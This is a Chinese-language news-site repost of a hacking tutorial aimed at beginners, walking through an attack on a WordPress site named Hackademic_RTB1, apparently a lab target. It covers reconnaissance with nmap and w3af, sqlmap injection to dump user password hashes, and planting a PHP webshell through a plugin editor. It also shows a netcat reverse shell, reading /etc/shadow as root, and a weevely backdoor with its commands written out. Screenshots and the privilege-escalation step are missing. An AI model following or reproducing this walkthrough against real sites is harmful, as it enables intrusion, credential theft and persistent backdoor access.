當前位置:
首頁 > 新聞 > 資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了

資深黑客教python小白攻破一個網站!超詳細的教學教程!太牛逼了

現在我們獲取了網站伺服器的IP地址為:173.236.138.113

尋找同一伺服器上的其它網站,我們使用sameip.org.

我們需要關於你網站的以下信息:

DNS records (A, NS, TXT, MX and SOA)

Web Server Type (Apache, IIS, Tomcat)

Registrar (the company that owns your domain)

Your name, address, email and phone

Scripts that your site uses (php, asp, asp.net, jsp, cfm)

Your server OS (Unix,Linux,Windows,Solaris)

Your server open ports to internet (80, 443, 21, etc.)

讓我們開始找你網站的DNS記錄,我們用who.is來完成這一目標.

我們發現你的DNS記錄如下

讓我們來確定web伺服器的類型

我們現在已經獲取了你的網站域名的註冊信息,包括你的重要信息等.

我們可以通過backtrack5中的whatweb來獲取你的網站伺服器操作系統類型和伺服器的版本.

我們發現你的網站使用了著名的php整站程序wordpress,伺服器的的系統類型為FedoraLinux,Web伺服器版本Apache 2.2.15.繼續查看網站伺服器開放的埠,用滲透測試工具nmap:

1-Find services that run on server(查看伺服器上運行的服務)

2-Find server OS(查看操作系統版本)

我們也會用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

我們輸入要檢測的網站地址,選擇完整的安全審計選項.

稍等一會,你將會看到掃描結果.

發現你的網站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

我們通過工具發現這個URL存在SQL注入,我們通過Sqlmap來檢測這個url.

Using sqlmap with –u url

過一會你會看到

輸入N按回車鍵繼續

我們發現你的網站存在mysql顯錯注入,mysql資料庫版本是5.0. 我們通過加入參數」-dbs」來嘗試採集資料庫名.

發現三個資料庫,接下來通過參數」-D wordpress -tables」來查看wordpress資料庫的所有表名

通過參數「-T wp_users –columns 」來查看wp_users表中的欄位.

接下來猜解欄位user_login和user_pass的值.用參數」-C user_login,user_pass–dump」

我們會發現用戶名和密碼hashes值. 我們需要通過以下在線破解網站來破解密碼hashes

登陸wordpress的後台wp-admin

嘗試上傳php webshell到伺服器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新文件,然後訪問我們的phpwebshell.

Phpwebshell被解析了,我們可以控制你網站的文件,但是我們只希望獲得網站伺服器的root許可權,來入侵伺服器上其它的網站。

我們用NC來反彈一個shell,首先在我們的電腦上監聽5555埠.

然後在Php webshell上反向連接我們的電腦,輸入你的IP和埠5555.

點擊連接我們會看到

接下來我們嘗試執行一些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用來顯示用戶的id和組)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

(顯示伺服器上當前的路徑)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

(顯示內核版本信息)

執行完成之後我們輸入id命令

id

我們發現我們已經是root許可權了

uid=0(root) gid=0(root)

現在我們可以查看/etc/shadow文件

cat/etc/shadow

2.用weevely創建一個密碼為koko的php後門

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

接下來上傳到伺服器之後來使用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

測試我們的hax.php後門

完成,撒花!

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 威客安全 的精彩文章:

才發布幾個小時 有黑客發現了iOS 12.1一個新的密碼繞過漏洞
軟體更新需謹慎:「挖礦」惡意軟體偽裝成Flash更新

TAG:威客安全 |